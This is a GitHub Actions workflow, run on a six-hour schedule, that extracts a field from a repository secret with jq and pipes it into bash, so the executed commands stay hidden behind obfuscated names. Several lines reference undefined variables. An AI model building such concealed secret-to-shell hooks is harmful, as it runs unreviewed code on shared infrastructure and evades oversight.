name: zhuanxiagjiaozhou
on:
  workflow_dispatch:
  schedule:
    - cron: '33 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: zhuanxiagjiaozhou
        env:
          tfg228: ${{ secrets.tfg228 }}
        run: |
          echo $tfg228 | jq -r .syyw7070 | /bin/bash
          echo $fw764 | jq -r .vuk35 | /bin/bash
          echo $uqwgr2258 | jq -r .jaj6706 | /bin/bash
          echo $b34 | jq -r .p8 | /bin/bash
          echo $qoqwp7 | jq -r .yh710 | /bin/bash
          echo $kc14 | jq -r .tk737 | /bin/bash
          echo $lhh98187 | jq -r .z00286 | /bin/bash
          echo $fj20140 | jq -r .jjrt5763 | /bin/bash

